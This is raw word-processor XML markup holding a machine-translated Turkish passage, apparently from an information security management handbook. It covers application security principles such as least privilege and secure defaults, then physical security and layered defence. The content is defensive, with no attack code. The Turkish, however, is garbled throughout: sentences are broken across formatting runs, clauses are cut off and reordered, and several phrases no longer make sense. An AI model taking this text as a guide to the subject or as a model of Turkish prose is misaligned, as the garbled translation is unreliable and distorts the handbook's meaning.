        <w:t>kod tasarlamak, yazmak ve test etmek zordur. En iyi master programlayıcılarına atanır.</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5. Uygulamaların mümkün olan en güvenli duruma getirilememesi. Arızalı çok kullanıcılı uygulamaları durdurmak veya oturum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> açmak için tercih edin </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">uygulamanın yeni bir örneğine. Arızalı tek kullanıcılı uygulamaları bir tek </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">kullanıcılı işletimde tercih et </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistemi.</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6. Uygulamaları mümkün olan en az ayrıcalıkla sınırlandırın. Kullanıcının ayrıcalıklarını tercih et. Aksi takdirde, bir</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Sınırlı profil oluşturuldu ve yalnızca amaç için kullanıldı. Asla bir sistem genelinde bir u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ygulama ayrıcalıkları vermeyin.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Çünkü programcı, uygulamanın çal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ışabileceği ortamı öngöremez ve </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistem yöneticisi riskleri anlayamayabilir, bu kuralın istisnaları son derece tehlikelidir.)</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7. Kontrol bypasslarına karşı koymak için uygulamaları baştan sona bağlayın. Güvenilir bir tek sistemli ortamı tercih edin.</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Aksi takdirde, güvenilir bir yol kullanın (örneğin, özel yerel bağlantı, uçtan uca şifreleme veya</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ikisinin hazırlanmış kombinasyonu).</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8. Bir uygulama kullanıcısının ayrıcalıklarına, yalnızca uygulamanın kullanımı için gerekl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">i olan işlevselliği dahil edin. </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Başvuruyu kolaylaştırmak için ayrı yetkilendirme gerektiren bird</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">en çok nesneye ayırmayı düşünün </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>birden fazla kullanıcıyı hassas görevlere dahil etmek.</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9. Kontroller güvenli ayarlara varsayılan olmalıdır. Kontrollerin karmaşık olduğu veya ince yollarla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> etkileşime girdiği durumlarda, </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>komut dosyaları (“sihirbazlar”) veya profiller sağlayın.</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">10. Verilere yakın lokalize kontrolleri tercih edin (örneğin, uygulamaya </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dosya sistemi, dosya yöneticisi </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistemi).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007E79CF"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1. Kodun bütünlüğünü doğrulamak ve kontrollerin atlanmasına karşı koymak için şifreleme tekniklerini kullanın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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2. Kurcalamaya karşı korumalı ambalajda bilinen ve güvenilir kaynaklardan gelen uygulamaları ve diğer programları tercih edin.</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00964C82" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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 George Santayana, Reason in Common Sense</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KIVRIMLI ERİŞİM VE KATMANLI SAVUNMA</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xml:space="preserve">Fiziksel güvenlik, bir şeyin emniyetini ve maddi varlığını sağlamak için alınan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>önlemler olarak tanımlanabilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Veya hırsızlığa, casusluğa, sabotaj veya zarara karşı birisi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> olabilir</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bilgi güvenliği bağlamında bu,</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bilgi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, ürünler ve insanlar hakkında.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fiziksel güvenlik en eski koruma şeklidir. Yıllardır insanlar kendil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>erini koruyorlardı.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Zarar ve değerli eşyalarını hırsızlık veya imhadan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kurtarır</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Geçmişte, fizik</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sel güvenlik tüm koruma biriydi</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> güvenlik olması gerekiyordu. Bununla birlikte, teknolojiyle, yalnızca fiziksel güvenlik e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tkili değildir. Bilgi Güvenliği</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> hedefine ulaşmak için birçok farklı güvenlik katmanını dağıtan bir yaklaşımdı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r; dolayısıyla “güvenlik girişi</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Katmanlar. ”Hiçbir şeyin yüzde 100 güvenli olmadığı kabulü ile bil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gi güvenliği derinliği kullanır</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ken yüksek güvenlik formunu elde etmek için katmanlarının. Bu katmanlardan herhangi birindeki zayıf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lık, güvenliğe neden olacaktır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kırmak. Fiziksel koruma, katmanlı bilgi güvenliği yaklaşımında il</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>k adımdır. Eğer mevcut değilse,</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> zayıf veya yanlış uygulamalarda kullanıldığında, bilgi güvenliği başarısız olacaktı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YAKLAŞIMI</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Fiziksel güvenlik, sınırsız bir şekilde ele a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lınamayan sürekli bir süreçtir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yaklaşım kuruluşun hedefleriyle tutarlı olmalı ve standartla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ra uygun olarak uygulanmalıdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ve bilgi güvenliği politikasında</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> belirtilen kurallar.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Çünkü fiziksel güvenlik dünyasında çok az bir değişiklik var (en azından</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> geri kalan kadar hızlı değil).</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bilgi güvenliği dâhilindeki kontroller), genellikle sıkıcı veya önemsiz olarak kabul edilir. Bu yanlış anlama, genellikle fiziksel güvenliğin ihmal edilmesine veya rastgele uygulanmasına neden olur.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Genellikle, en büyük zayıflığı</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Herhangi bir bilgi güvenliği kontrolü, kontrolün kendisi değil, bir kontrolün </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yanlış uygulanmasıdır. Fiziksel</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> güvenlik, diğer bilgi güvenliği ile aynı enerji, oda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>k ve ciddiyetle ele alınmalıdır</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kontrol. </w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Aslında, güvenlik kontrollerine tutarlı ve önceden belirlenmiş bir şekilde </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yaklaşılmalı ve uygulanmalıdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Öngörülebilir, tekrarlanabilir ve e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tkili bilgi güvenliği sağlamak.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kilitler, korumalar, güvenlik kameraları ve kimlik kartları sadec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e fiziksel araç ve gereçlerdir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Güvenlik. Fiziksel güvenliği planlamak ve tasarlamak için aşağıdaki sorulara cevap verilmelidir:</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Neyi koruyorsun?</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Bilgilerin korunması (ekonomik, politik veya kamu güvenliği açısından) ne kadar önemlidir?</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Kimi koruyorsun ve onlar için daha önemli olan şey nedir? Gizlilik, bütünlük veya</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kullanılabilirliği?</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Siz ve onu kimden koruyorsunuz?</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Verilen, tüm yerlerin Fort Knox’un fiziksel güvenliğine (kim orada çalışmak ister?) İhtiyaç duymaz, fiziksel olarak</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İnsanların önemi ve duyarlılığı ile orantılı olarak güvenlik uygulanmalı ve</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18 Kasım 2003, Salı 10:03</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1926 Bilgi Güvenliği Yönetimi El Kitabı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CC3D89"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Korur. Bu bölümde, bilgi güvenliğindeki ortak tehditler ve güvenlik açıkları kay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>naklı riskler tartışılmaktadır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ve ne kadar iyi fiziksel güvenlik bu riskleri ele almak için bir temel oluşturabili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PSİKOLOJİSİ</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Fiziksel güvenliği planlarken ve tasarlarken, fiziksel olduğu kadar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> psikolojik olduğunu unutmayın.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Psikolojik etkinin sahip olabileceği avantajları göz önünde bulundurmak önemlidir. Eğer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> biri fiziksel tasarlayabilirse</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Güvenlik, güvenliği yüksek oranda görünür kılacak </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>şekilde (ayrıntıları korurken),</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Örgüt iyi bir şekilde korunuyor ve bu da tehdit edici bir faaliyet için daha az hedef haline </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>geliyor. Bu dolaylı bir yoldur.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu kuruma karşı suç işleme arzusunu ortadan kaldırır. Fiziksel gü</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>venliğin etkinliği, olduğu gibi</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> herhangi bir güvenlik kontrolü, fırsatın elimine edilmesiyle ölçülür</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>; fiziksel güvenlik psikolojisi</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Arzu ortadan kaldırmak için ölçülür.</w:t>
      </w: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ESİS FİZİKSEL GÜVENLİK</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Modern iş yerinin çeşitliliği genellikle evrensel, katı fiziksel güvenlik kur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>manın pratik olmamasını sağlar.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Standartları. Bununla birlikte, tam olarak ulaşmak için her yerde yeterl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>fiziksel güvenlik gereklidir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Güvenli ortam Bu bölüm, tesis türlerini, nasıl farklılık gösterdiklerini ve yak</w:t>
      </w:r>
      <w:r>
